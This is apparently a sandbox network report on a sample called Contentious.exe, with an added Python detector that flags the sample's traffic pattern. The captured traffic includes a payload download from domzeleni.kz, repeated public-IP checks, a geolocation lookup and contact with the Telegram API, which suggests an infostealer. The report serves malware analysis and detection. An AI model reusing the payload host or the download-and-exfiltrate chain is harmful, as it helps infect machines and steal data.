                                          Jul 25, 2024 09:56:57.776087999 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.776153088 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.777199030 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.777262926 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.777391911 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.782278061 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:58.525434971 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:58.526751041 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:58.526791096 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:58.526870966 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:58.527148962 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:58.527160883 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:58.575654030 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.017314911 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.019277096 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:59.019313097 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.167088032 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.167195082 CEST44349750188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:59.167306900 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:59.167748928 CEST49750443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:59.171415091 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.172591925 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.176822901 CEST8049749158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:59.176882029 CEST4974980192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.177613020 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:59.177685022 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.177807093 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:59.182528019 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:00.643740892 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:00.646431923 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:00.646481037 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:00.646560907 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:00.647186041 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:00.647197962 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:00.685147047 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:57:01.142071962 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.144854069 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:01.144891024 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.269419909 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.269666910 CEST44349752188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:57:01.269736052 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:01.270793915 CEST49752443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:57:06.912273884 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:57:06.917759895 CEST8049751158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:06.917870998 CEST4975180192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:57:06.920337915 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:06.920388937 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:06.920466900 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:06.921019077 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:06.921031952 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.555932999 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.556080103 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.558072090 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.558090925 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.558332920 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.559920073 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.604506969 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.604892015 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.604907990 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.855132103 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.855304956 CEST44349753149.154.167.220192.168.2.4
                                          Jul 25, 2024 09:57:07.855400085 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:07.856005907 CEST49753443192.168.2.4149.154.167.220
                                          Jul 25, 2024 09:57:54.658999920 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:57:54.660269976 CEST4974080192.168.2.4158.101.44.242
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 09:56:37.145128012 CEST | 63412 | 53 | 192.168.2.4 | 1.1.1.1
Jul 25, 2024 09:56:37.404407024 CEST | 53 | 63412 | 1.1.1.1 | 192.168.2.4
Jul 25, 2024 09:56:43.295393944 CEST | 54397 | 53 | 192.168.2.4 | 1.1.1.1
Jul 25, 2024 09:56:43.302406073 CEST | 53 | 54397 | 1.1.1.1 | 192.168.2.4
Jul 25, 2024 09:56:44.880415916 CEST | 54894 | 53 | 192.168.2.4 | 1.1.1.1
Jul 25, 2024 09:56:44.888578892 CEST | 53 | 54894 | 1.1.1.1 | 192.168.2.4
Jul 25, 2024 09:57:06.912903070 CEST | 49208 | 53 | 192.168.2.4 | 1.1.1.1
Jul 25, 2024 09:57:06.919586897 CEST | 53 | 49208 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 09:56:37.145128012 CEST | 192.168.2.4 | 1.1.1.1 | 0x7de6 | Standard query (0) | domzeleni.kz | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:43.295393944 CEST | 192.168.2.4 | 1.1.1.1 | 0xf222 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:44.880415916 CEST | 192.168.2.4 | 1.1.1.1 | 0xb28f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:57:06.912903070 CEST | 192.168.2.4 | 1.1.1.1 | 0x180e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 09:56:37.404407024 CEST | 1.1.1.1 | 192.168.2.4 | 0x7de6 | No error (0) | domzeleni.kz | - | 185.98.5.168 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:43.302406073 CEST | 1.1.1.1 | 192.168.2.4 | 0xf222 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:44.888578892 CEST | 1.1.1.1 | 192.168.2.4 | 0xb28f | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:56:44.888578892 CEST | 1.1.1.1 | 192.168.2.4 | 0xb28f | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 09:57:06.919586897 CEST | 1.1.1.1 | 192.168.2.4 | 0x180e | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                          • domzeleni.kz
                                          • reallyfreegeoip.org
                                          • api.telegram.org
                                          • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 09:56:43.313987970 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 25, 2024 09:56:44.039083958 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 07:56:43 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cd6a441cb22fb83a5d07a2459837aec3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 09:56:44.043277025 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 09:56:44.221239090 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 07:56:44 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8ea0e8ef1a59babbf2f692c6a5c4631f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 09:56:45.821000099 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 09:56:47.189729929 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 07:56:47 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a7b2eefdd9ba5e083c1d431a9c25038a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
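The session above shows Contentious.exe (PID 7972) asking checkip.dyndns.org for its public address with the same fixed User-Agent on every request, and the DNS tables show the sandbox host resolving reallyfreegeoip.org and then api.telegram.org in the same window: external-IP lookup, geolocation, Telegram Bot API. The Python below is an added example, not part of the Joe Sandbox report or the sample, that parses a request/response pair in the form the report prints, maps the resolved names onto those three stages, and flags a host when all three are present together with the captured User-Agent. The DNS rows, the request, the response body and the per-session request timestamps are transcribed from this report; the stage host lists, the function names, the verdict label and the burst thresholds are this example's own assumptions.

```python
"""Added example (not from the Joe Sandbox report): flag the external-IP ->
geolocation -> Telegram chain recorded for Contentious.exe (PID 7972)."""
import re
from collections import defaultdict

# Constructed sample, transcribed from the report's DNS answer table ("name TYPE value").
DNS_ANSWERS = """
domzeleni.kz A 185.98.5.168
checkip.dyndns.org CNAME checkip.dyndns.com
checkip.dyndns.com A 158.101.44.242
reallyfreegeoip.org A 188.114.96.3
api.telegram.org A 149.154.167.220
"""
# Constructed sample: first request and response body of HTTP session 0.
HTTP_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\r\n"
    "Host: checkip.dyndns.org\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
HTTP_RESPONSE_BODY = ("<html><head><title>Current IP Check</title></head>"
                      "<body>Current IP Address: 8.46.123.33</body></html>\r\n")
# Constructed sample: (time, pid, host) of the OUT requests in sessions 0-3.
SESSION_REQUESTS = [
    ("09:56:43.313987970", 7972, "checkip.dyndns.org"),
    ("09:56:44.043277025", 7972, "checkip.dyndns.org"),
    ("09:56:45.821000099", 7972, "checkip.dyndns.org"),
    ("09:56:47.807820082", 7972, "checkip.dyndns.org"),
    ("09:56:51.110867023", 7972, "checkip.dyndns.org"),
    ("09:56:53.599736929", 7972, "checkip.dyndns.org"),
]
# Assumption: stage host lists come from this report's DNS table only.
STAGES = {
    "external_ip": {"checkip.dyndns.org", "checkip.dyndns.com"},
    "geolocation": {"reallyfreegeoip.org"},
    "telegram_api": {"api.telegram.org"},
}
# The User-Agent the report captures on every checkip.dyndns.org request.
FIXED_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_RE = re.compile(r"Current IP Address: (\d{1,3}(?:\.\d{1,3}){3})")


def parse_dns_answers(text):
    """Map each answered name to its set of (type, value) records."""
    records = defaultdict(set)
    for line in text.strip().splitlines():
        name, rtype, value = line.split()
        records[name].add((rtype, value))
    return dict(records)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers with lowercased names)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def extract_reported_ip(body):
    """Pull the address out of checkip.dyndns.org's 'Current IP Address:' body."""
    match = IP_RE.search(body)
    return match.group(1) if match else None


def stages_seen(hostnames):
    """Which stages of the chain the given hostnames cover."""
    names = set(hostnames)
    return {stage for stage, hosts in STAGES.items() if names & hosts}


def to_seconds(hms):
    """'HH:MM:SS.fffffffff' -> seconds since midnight (strptime cannot take 9 digits)."""
    h, m, s = hms.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def ip_check_bursts(requests, window_s=30.0, min_count=3):
    """PIDs that hit an external-IP host at least min_count times within window_s."""
    by_pid = defaultdict(list)
    for ts, pid, host in requests:
        if host in STAGES["external_ip"]:
            by_pid[pid].append(to_seconds(ts))
    flagged = {}
    for pid, times in by_pid.items():
        times.sort()
        for i in range(len(times)):        # sliding window over sorted times
            j = i
            while j + 1 < len(times) and times[j + 1] - times[i] <= window_s:
                j += 1
            if j - i + 1 >= min_count:
                flagged[pid] = j - i + 1
                break
    return flagged


def classify(dns_text, request_raw, response_body):
    """Verdict for one host: all three stages plus the fixed UA on the IP check."""
    answers = parse_dns_answers(dns_text)
    _method, _path, headers = parse_http_request(request_raw)
    seen = stages_seen(list(answers) + [headers.get("host", "")])
    fixed_ua = headers.get("user-agent") == FIXED_UA
    verdict = "ip_geo_telegram_chain" if seen == set(STAGES) and fixed_ua else "inconclusive"
    return {"stages": sorted(seen), "fixed_ua": fixed_ua,
            "reported_ip": extract_reported_ip(response_body), "verdict": verdict}
```

The verdict deliberately requires all three stages: a public-IP lookup on its own is common in legitimate software, and the geolocation step alone is what the report's "Tries to detect the country of the analysis system" signature covers. The burst check is a separate, weaker signal, since the report shows six checkip.dyndns.org requests from one process inside about ten seconds.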


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 09:56:47.807820082 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 09:56:49.885149002 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 07:56:49 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 478c843d198a4cfc9b348b4a12a9846c
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 09:56:49.886353970 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 07:56:49 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 478c843d198a4cfc9b348b4a12a9846c
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 09:56:50.421607971 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 07:56:49 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 478c843d198a4cfc9b348b4a12a9846c
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.449743158.101.44.242807972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 25, 2024 09:56:51.110867023 CEST | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jul 25, 2024 09:56:52.869508028 CEST | 320 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:52 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 2e0b6dddf050cc05399e028d141ac0fa
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           3 | 192.168.2.4 | 49745 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 25, 2024 09:56:53.599736929 CEST | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jul 25, 2024 09:56:55.177944899 CEST | 320 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:55 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 5f51251e3990569865e9321feb64755b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           4 | 192.168.2.4 | 49747 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 25, 2024 09:56:55.810894012 CEST | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jul 25, 2024 09:56:57.163333893 CEST | 320 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 7d1e1991430a35aac87dea97021faf2d
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           5 | 192.168.2.4 | 49749 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 25, 2024 09:56:57.777391911 CEST | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jul 25, 2024 09:56:58.525434971 CEST | 320 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:58 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: a792482f8bae1db13e788de32e8be5a4
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           6 | 192.168.2.4 | 49751 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 25, 2024 09:56:59.177807093 CEST | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jul 25, 2024 09:57:00.643740892 CEST | 320 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:57:00 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 72783c58bb9403e2782fe626730b961b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           0 | 192.168.2.4 | 49736 | 185.98.5.168 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2024-07-25 07:56:41 UTC | 182 | OUT | GET /image/bwSNbczRiJIuD15.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: domzeleni.kz
                                          Cache-Control: no-cache
                                           2024-07-25 07:56:41 UTC | 341 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 25 Jul 2024 07:56:41 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 133696
                                          Last-Modified: Thu, 25 Jul 2024 07:22:10 GMT
                                          Connection: close
                                          Cache-Control: max-age=604800
                                          Expires: Thu, 01 Aug 2024 07:56:41 GMT
                                          ETag: "66a1fd22-20a40"
                                          X-Powered-By: PleskLin
                                          Accept-Ranges: bytes
